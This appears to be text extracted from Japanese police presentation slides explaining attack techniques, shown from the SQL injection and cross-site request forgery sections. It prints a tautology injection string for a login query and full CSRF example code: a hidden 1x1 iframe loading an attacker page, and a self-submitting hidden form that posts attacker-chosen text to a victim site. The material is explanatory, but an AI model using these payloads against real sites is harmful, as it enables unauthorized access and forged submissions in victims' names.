3(5)SQLインジェクションのデモ1 ンのデモ1 1 条 件 に 合 致 するユーザの 登 録 情 報 を 表 示 するWEBアプリケーション DB 登 録 ID = 入 力 したID AND DB 登 録 パスワード = 入 力 したパスワード で 条 件 に 合 致 するユーザの 情 報 を 表 示 する 2 SQLインジェクションによって 全 ユーザの 登 録 情 報 を 表 示 パスワード 入 力 欄 に OR A = A を 入 力 すると DB 登 録 ID = 入 力 したID AND DB 登 録 パスワード= OR A = A 偽 又 は 真 偽 常 に 真 となり 全 ての 登 録 情 報 が 条 件 に 合 致 するものとなる 68
3(5)SQLインジェクションのデモ2 ンのデモ2 SQL Injection Demo 69
ユーザIDとパス ワードの 対 がDBに 一 致 するものを 教 えて! 3(5)SQLインジェクションの ンの 補 足 SQL QUERY ユーザIDとパス ワードの 対 でね 探 しま~す 又 は A が A と 同 じものをね! WEBサーバ SQL QUERY SQLサー バ え? A ってDB 項 目 に 関 係 ないじゃん? 攻 撃 成 功 WEBサーバ SQL REPLY SQLサー バ それだとDBの すべての 記 録 が 該 当 します! WEBサーバ SQLサー バ 70
目 次 1 警 察 におけるインターネットの 観 測 (1) センサーへのアクセス (2) DoS 攻 撃 被 害 の 観 測 分 析 (3) ボットネットの 活 動 状 況 (4) P2Pファイル 共 有 ネットワークの 観 測 2 警 察 の 取 り 組 み 3 最 近 に 見 る 攻 撃 の 技 術 的 手 法 (1) 標 的 型 メールのマルウェアの 傾 向 (2) リモートデスクトップへの 攻 撃 (3) WEBページの 改 ざんもどき (4) DNS_Amp (5) SQLインジェクション (6) クロスサイト リクエスト フォージェリ 71
3(6)クロスサイト リクエスト フォージェリ リ 1 WEBを 閲 覧 している 人 があるページを 開 きました そのページには 悪 意 あるコードが 埋 め 込 まれていました その 瞬 間 に この 女 性 は 某 市 役 所 の ご 意 見 フォーム に 犯 行 予 告 を 書 き 込 んでいました WEB 閲 覧 者 ご 意 見 フォーム
3(6)クロスサイト リクエスト フォージェリ リ 2 iframe って 何? 閲 覧 したWEBページ Inline FRAME の 略 1つのWEBページ 内 に 別 のWEBペー ジを 指 定 して 表 示 する 機 能 <iframe src=" 表 示 したいページのアドレス" width="200" height="200" > フレームを 表 示 できないブラウザに 表 示 するメッセージ </iframe> A.html B.html 見 えない 大 きさの iframeに 悪 意 ある コードの 記 述 あり A.html B.html WEB 閲 覧 者 73
3(6)クロスサイト リクエスト フォージェリ リ 3 閲 覧 したWEBページに 埋 め 込 まれていたコード <!DOCTYPE html> <html lang="ja"> <head> <title> 誘 導 用 のページ</title> </head> <body> <p>ようこそいらっしゃいました </p> <iframe width="1" height="1" src="www.attack.co.jp/attack.html"> </iframe></body> </html> iframe Webサイトのページの 中 に 別 の ページを 埋 め 込 むことができる ここでは サイズが1 1 iframeのなかで な www.attack.co.jp/attack.html を 表 示 させる
3(6)クロスサイト リクエスト フォージェリ リ 4 強 制 的 に 開 かれた attack.html の 中 身 は? <!DOCTYPE html> <html lang="ja"> ページを 開 いたら 以 下 の 内 容 を 送 信 <head> <title> 攻 撃 用 のページ</title> </head> <body onload="document.attackform.submit();"> 送 信 先 はここで 示 すWEBページ <form name="attackform" method="post" action="http://main.victiom.com/bbs/register.cgi"> " 送 信 内 容 は あらかじめ <input type="hidden" name="title" value=" 攻 撃 者 が 指 定 した 題 名 "> 埋 め 込 み 済 み <input type="hidden" name="article" value=" 攻 撃 者 が 指 定 した 本 文 "> <input type="submit" value=" 送 信 "> </form> </body> </html> 閲 覧 者 が 意 図 しないうちに あるフォームに 対 して 投 稿 を 送 信 させることができる (ログインしているサイトに 対 して 送 信 させる 行 為 を 指 す 場 合 もある) Cross site request forgeries(csrf or XSRF) forgery: 改 ざん
3(6)クロスサイト リクエスト フォージェリ5 スト リ5 2 リンクをクリック 4 悪 意 ある ページを ダウンロード 1 あるサイトで 3 見 えない 大 きさの iframeが 潜 んでいて 5ページを 開 いた 瞬 間 に 組 み 込 まれていた 表 題 本 文 の フォームデータを 送 信 ここに 役 立 つ アプリがあるよ! 6 犯 行 予 告 を 書 き 込 み WEB 閲 覧 者 ご 意 見 フォーム WEB 閲 覧 者 のブラウザが ご 意 見 フォームにリクエストを 送 信 したことになる 76